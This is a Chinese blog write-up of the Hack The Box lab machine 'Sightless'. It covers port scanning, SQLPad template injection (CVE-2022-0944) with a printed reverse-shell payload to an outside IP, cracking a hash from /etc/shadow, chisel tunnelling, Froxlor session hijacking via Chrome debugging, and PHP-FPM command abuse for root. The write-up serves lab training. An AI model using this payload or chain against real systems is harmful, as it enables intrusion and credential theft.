当前位置: 首页 > news >正文

Hack The Box-Sightless

总体思路

CVE-2022-0944->密码破解->chrome调试->PHP-FPM命令执行

信息收集&端口利用

nmap -sSVC sightless.htbStarting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 08:40 CST
Nmap scan report for sightless.htb
Host is up (0.84s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp
| tls-alpn: 
|_  ftp
| ssl-cert: Subject: commonName=sightless.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-05-15T18:55:27
|_Not valid after:  2034-05-13T18:55:27
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (sightless.htb FTP Server)
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
| tls-nextprotoneg: 
|_  ftp
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Sightless.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)

目标只开放了21、22和80端口,先看80端口信息

在这里插入图片描述

在这里插入图片描述

没有什么利用点

但是在提供的服务中,有一个重定向到了sqlpad.sightless.htb,将其加入hosts文件中访问

在这里插入图片描述

是一个sqlpad的组件,在有数据库用户密码的情况下能够连接到数据库并执行命令

在这里插入图片描述

CVE-2022-0944

在BP中能够发现其版本为6.10.0

在这里插入图片描述

搜索该版本漏洞,发现存在CVE-2022-0944

在这里插入图片描述

root@docker

过程为:点击连接->新建连接->选择MySQL作为数据库->在数据库当中输入payload->Test运行命令

在这里插入图片描述

#payload
{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.16.2/9000 0>&1"') }}

在这里插入图片描述

发现直接就是root用户,怀疑当前在容器中

在这里插入图片描述

进一步查阅文件后,发现确实存在dockerenv文件

查看用户,发现还有michael和node两个用户

在这里插入图片描述

密码破解

michael@sightless

可能需要用到这两个用户登录到主机,查看shadow文件

在这里插入图片描述

将michael用户的hash值复制出来解密

在这里插入图片描述

使用该密码登录到主机

在这里插入图片描述

老样子三件套,查看sudo权限、suid权限和端口开放情况

sudo -l
find / -perm -u=s -f type 2>/dev/null
netstat -nltp

在这里插入图片描述

有一个8080端口可疑,转发到本地查看

#kali
chisel server -p 6150 --reverse
#target
chmod +x chisel
./chisel client 10.10.16.2:6150 R:8080:127.0.0.1:8080

在这里插入图片描述

是一个froxlor组件

一番尝试后好像也没有利用点

看看把另外几个端口代理出来

./chisel client 10.10.16.2:6150 R:3000:127.0.0.1:3000 R:8000:127.0.0.1:8080 R:41219:127.0.0.1:41219 R:43425:127.0.0.1:43425 R:44765:127.0.0.1:44765

chrome调试

使用bp的chrome进行调试

在这里插入图片描述

添加完后点击inspect fallback

在这里插入图片描述

在这里插入图片描述

能看到界面在登录和登录成功之间反复横跳,需要抓到登陆成功时候的cookie

替换后进入界面

在这里插入图片描述

PHP-FPM命令执行

root@sightless

找到PHP-FPM

在这里插入图片描述

按照他的格式添加命令

在这里插入图片描述

保存之后,重启一下服务

在这里插入图片描述

在这里插入图片描述

文件有了,需要再去修改一下权限才能查看

在这里插入图片描述

再按照刚刚的流程走一遍

在这里插入图片描述

复制到本地,修改权限后即可登录

在这里插入图片描述

http://www.lryc.cn/news/437886.html

相关文章:

  • Linux驱动开发-字符设备驱动开发
  • 好用的电脑录屏软件有哪些?推荐4款专业工具。
  • web基础之XSS
  • 目标检测-小目标检测方法
  • 连接数据库(以MySQL为例)
  • Mysql高级教程
  • 基于Ubuntu2404搭建mysql8配置远程访问
  • 前端工程师职业发展路线图
  • 人工智能(AI)正在以前所未有的速度融入我们生活的方方面面
  • OpenCV-模板匹配多个目标
  • uniapp 原生插件开发 UI
  • 性能测试-性能分析与调优原理总结
  • 【机器学习】4 ——熵
  • linux命令用于删除文本文件中的重复行的命令uniq详解
  • PHP智驭未来悦享生活智慧小区物业管理小程序系统源码
  • 深度学习:怎么看pth文件的参数
  • MMLU-Pro 基准测试数据集上线,含 12k 个跨学科复杂问题,难度提升,更具挑战性!DeepSeek 数学模型一键部署
  • Vue | Vue深入浅出——Vue中的render函数详解
  • 数学基础 -- 线性代数之奇异值
  • Python爬虫使用实例-wallpaper
  • 探索Go语言中的随机数生成、矩阵运算与数独验证
  • 无线安全(WiFi)
  • 牛客练习赛128:Cidoai的平均数对(背包dp)
  • Python世界:简易地址簿增删查改算法实践
  • 网络安全-intigriti-0422-XSS-Challenge Write-up
  • Debian Linux 11 使用crash
  • python列表 — 按顺序找出b表中比a表多出的元素
  • 如何使用Python创建目录或文件路径列表
  • 领夹麦克风哪个品牌好,哪种领夹麦性价比高,无线麦克风推荐
  • 苍穹外卖学习笔记(五)